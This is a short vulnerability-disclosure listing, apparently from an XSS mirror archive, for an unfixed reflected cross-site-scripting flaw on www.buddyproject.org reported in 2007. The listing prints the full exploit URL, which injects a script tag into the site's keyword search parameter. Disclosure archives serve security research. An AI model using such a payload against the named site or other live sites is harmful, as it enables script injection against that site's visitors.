Security researcher CoNqUeRoR, has submitted on 02/07/2007 a cross-site-scripting (XSS) vulnerability affecting www.buddyproject.org, which at the time of submission ranked 1078061 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/07/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 02/07/2007 |
Date published: 02/07/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: CoNqUeRoR |
Domain: www.buddyproject.org |
Category: XSS |
Pagerank: 1078061 |
URL: http://www.buddyproject.org/capers/default.asp?type=advanced&txtgrade=&txttopic=&keyword="<script>al ert("HACKED")</script>&btnSubmit.x=0&btnSubmit.y=0&grade=&topicx=Computer+Drawing&topicx=Database&to picx=Fall+Holidays&topicx=Family+Involvement&topicx=Fine+Arts&topicx=Language+Arts&topicx=Mathematic s&topicx=Multi-media&topicx=Patriotism&topicx=Science&topicx=Social+Studies&topicx=Spreadsheet%2FGra phs&topicx=Spring+Holidays&topicx=Summer+Holidays&topicx=Winter+Holidays&topicx=Word+Processing&nore cs=True |
Click here to view the mirror
|
|
|